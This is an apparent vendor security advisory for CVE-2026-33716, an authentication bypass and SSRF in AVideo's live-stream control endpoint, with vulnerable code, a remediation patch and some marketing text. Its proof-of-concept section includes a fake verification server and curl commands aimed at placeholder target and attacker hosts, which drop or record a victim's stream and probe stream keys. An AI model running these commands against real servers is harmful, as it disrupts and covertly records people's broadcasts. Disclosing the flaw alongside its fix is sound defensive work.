CVE-2026-33716

CVE-2026-33716 is a critical-severity improper authentication vulnerability in wwbn/avideo (composer), affecting versions <= 26.0. No fixed version is listed yet.

Summary

The standalone live stream control endpoint at plugin/Live/standAloneFiles/control.json.php accepts a user-supplied streamerURL parameter that overrides where the server sends token verification requests. An attacker can redirect token verification to a server they control that always returns {"error": false}, completely bypassing authentication. This grants unauthenticated control over any live stream on the platform, including dropping active publishers, starting/stopping recordings, and probing stream existence.

Details

The vulnerability exists because the streamerURL parameter is accepted directly from user input with no validation:

plugin/Live/standAloneFiles/control.json.php:77-79, User input overrides server config:

if (!empty($_REQUEST['streamerURL'])) {
    $streamerURL = $_REQUEST['streamerURL'];
}

plugin/Live/standAloneFiles/control.json.php:83-91, The user-controlled value is assigned to the request object:

$obj->streamerURL = $streamerURL;

plugin/Live/standAloneFiles/control.json.php:115-126, Token verification is sent to the attacker-controlled URL:

$verifyTokenURL = "{$obj->streamerURL}plugin/Live/verifyToken.json.php?token={$obj->token}";
// ...
$content = file_get_contents($verifyTokenURL, false, stream_context_create($arrContextOptions));

The legitimate verifyToken.json.php performs cryptographic token validation via Live::decryptHash() and checks token expiry (12-hour window). By redirecting verification to an attacker server, all of this is bypassed, the attacker's server simply responds with {"error": false}.

After authentication is bypassed, the attacker can execute any of the four supported commands (lines 150-186): record_start, record_stop, drop_publisher, and is_recording, which issue control commands to the local NGINX RTMP control module.

SSL verification is also explicitly disabled (lines 119-124), meaning the SSRF request will follow any attacker URL without certificate validation.

Notably, the developers were aware of this exact attack pattern and fixed it in the sibling file standAloneFiles/saveDVR.json.php on 2026-03-19 with an explicit comment: "SECURITY: User-supplied webSiteRootURL is intentionally NOT accepted. Allowing it would enable SSRF." The same fix was not applied to control.json.php.

PoC

Step 1: Set up an attacker server that returns {"error": false} for all requests.

# Minimal Python server on attacker machine (attacker.example.com:8888)
python3 -c '
import http.server, json
class H(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.send_header("Content-Type","application/json")
        self.end_headers()
        self.wfile.write(json.dumps({"error": False}).encode())
    def log_message(self, *a): pass
http.server.HTTPServer(("0.0.0.0", 8888), H).serve_forever()
'

Step 2: Drop a victim's live stream (kill their broadcast):

curl -s "https://target.example.com/plugin/Live/standAloneFiles/control.json.php?token=anything&command=drop_publisher&name=VICTIM_STREAM_KEY&app=live&streamerURL=http://attacker.example.com:8888/"

Expected response (authentication bypassed, command executed):

{"error":false,"msg":"","streamerURL":"http://attacker.example.com:8888/","token":"anything","command":"drop_publisher","app":"live","name":"VICTIM_STREAM_KEY","response":"","requestedURL":"http://localhost:8080/control/drop/publisher?app=live&name=VICTIM_STREAM_KEY"}

Step 3: Start unauthorized recording of a victim's stream:

curl -s "https://target.example.com/plugin/Live/standAloneFiles/control.json.php?token=anything&command=record_start&name=VICTIM_STREAM_KEY&app=live&streamerURL=http://attacker.example.com:8888/"

Step 4: Probe whether a stream name is active:

curl -s "https://target.example.com/plugin/Live/standAloneFiles/control.json.php?token=anything&command=is_recording&name=GUESS_STREAM_KEY&app=live&streamerURL=http://attacker.example.com:8888/"

Impact

  • Denial of Service on Live Streams: Any unauthenticated attacker can terminate any active live broadcast using drop_publisher, causing immediate disruption for streamers and viewers.
  • Unauthorized Recording: An attacker can start recording any live stream without authorization using record_start, potentially capturing private or sensitive content.
  • Stream Enumeration: The is_recording command allows probing for valid stream names.
  • SSRF: The server makes an outbound HTTP request to an attacker-controlled URL via file_get_contents(), which could be used to scan internal services or exfiltrate data via the request URL.
  • No authentication required: The entire attack is performed without any credentials.

The application does not adequately verify the identity of a user, device, or process before granting access. Typical impact: unauthorized access to functions or data reserved for authenticated parties.

CVE-2026-33716 has a CVSS score of 9.4 (Critical). The vector is network-reachable, no privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. No fixed version is listed yet, so configuration controls and monitoring matter more in the interim.

Affected versions

wwbn/avideo (<= 26.0)

Security releases

Not available

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

Remove the streamerURL request parameter override entirely, matching the fix already applied in saveDVR.json.php. In plugin/Live/standAloneFiles/control.json.php, replace lines 77-79:

// BEFORE (vulnerable):
if (!empty($_REQUEST['streamerURL'])) {
    $streamerURL = $_REQUEST['streamerURL'];
}

// AFTER (fixed):
// SECURITY: User-supplied streamerURL is intentionally NOT accepted.
// Allowing it would enable authentication bypass and SSRF via file_get_contents
// on an attacker-controlled host. streamerURL MUST come from the configuration
// file or be hard-coded in this file above.
if (empty($streamerURL)) {
    error_log("control.json.php: streamerURL is not configured");
    die(json_encode(['error' => true, 'msg' => 'Server not configured']));
}

Frequently Asked Questions

  1. What is CVE-2026-33716? CVE-2026-33716 is a critical-severity improper authentication vulnerability in wwbn/avideo (composer), affecting versions <= 26.0. No fixed version is listed yet. The application does not adequately verify the identity of a user, device, or process before granting access.
  2. How severe is CVE-2026-33716? CVE-2026-33716 has a CVSS score of 9.4 (Critical). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of wwbn/avideo are affected by CVE-2026-33716? wwbn/avideo (composer) versions <= 26.0 is affected.
  4. Is there a fix for CVE-2026-33716? No fixed version is listed for CVE-2026-33716 yet. Monitor the advisory for updates and apply mitigations in the interim.
  5. Is CVE-2026-33716 exploitable, and should I be worried? Whether CVE-2026-33716 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  6. What actually determines whether CVE-2026-33716 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2026-33716? No fixed version is listed yet. In the interim: Keep the dependency up to date. Ensure authentication checks are present and cannot be bypassed by manipulating request parameters.

Other vulnerabilities in wwbn/avideo

CVE-2026-33731CVE-2026-33692CVE-2026-33684CVE-2026-54458CVE-2026-50183

Stop the waste.
Protect your environment with Kodem.